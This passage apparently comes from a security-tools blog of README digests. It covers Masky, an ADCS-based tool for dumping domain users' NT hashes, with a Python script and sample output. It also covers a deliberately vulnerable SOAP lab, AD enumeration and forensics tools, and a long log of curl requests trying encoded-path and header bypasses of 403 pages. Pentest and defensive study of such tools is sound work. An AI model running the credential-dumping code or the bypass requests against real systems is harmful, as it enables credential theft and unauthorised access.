Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln. It would requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.

For both usages, you need first to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its intial ImagePath value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop.

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()

# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)

# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False

# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")

return True


if __name__ == "__main__":
dump_nt_hashes()

Its execution generate the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Acknowledgments



Erlik - Vulnerable Soap Service


Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Informaion Disclosure
  • Command Inejction
  • Brute Force
  • Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install requirements.txt

Usage

sudo python3 vulnerable_soap.py

Exploiting Vulnerabilities

LFI

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py

SQL Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py

Informaion Disclosure

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py

Command Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py

Brute Force

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py

Deserialization

Code:

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py



PyPI Repository Warns Python Project Maintainers About Ongoing Phishing Attacks

The Python Package Index, PyPI, on Wednesday sounded the alarm about an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates to legitimate packages. "This is the first known phishing attack against PyPI," the maintainers of the official third-party software repository said in a series of tweets. The social engineering attack entails sending

XCSSET Malware Updates with Python 3 to Target macOS Monterey Users

The operators of the XCSSET macOS malware have upped the stakes by making iterative improvements that add support for macOS Monterey by upgrading its source code components to Python 3. "The malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022," SentinelOne researchers

10 Credential Stealing Python Libraries Found on PyPI Repository

In what's yet another instance of malicious packages creeping into public code repositories, 10 modules have been removed from the Python Package Index (PyPI) for their ability to harvest critical data points such as passwords and API tokens. The packages "install info-stealers that enable attackers to steal developer's private data and personal credentials," Israeli cybersecurity firm Check

Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. (1)

To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.



An Easier Way to Keep Old Python Code Healthy and Secure

Python has its pros and cons, but it's nonetheless used extensively. For example, Python is frequently used in data crunching tasks even when there are more appropriate languages to choose from. Why? Well, Python is relatively easy to learn. Someone with a science background can pick up Python much more quickly than, say, C. However, Python's inherent approachability also creates a couple of

Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page


Tool that tests MANY url bypasses to reach a 40X protected page.

If you wonder why this code is nothing but a dirty curl wrapper, here's why:

  • Most of the python requests do url/path/parameter encoding/decoding, and I hate this.
  • If I submit raw chars, I want raw chars to be sent.
  • If I send a weird path, I want it weird, not normalized.

This is surprisingly hard to achieve in python without loosing all of the lib goodies like parsing, ssl/tls encapsulation and so on.
So, be like me, use curl as a backend, it's gonna be just fine.


Setup for bypass.py

# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"

Usage

Expected result
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64 ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 S afari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: % {size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/ api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list 2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Curren t: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w ' \nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'ht tp://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolo kia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
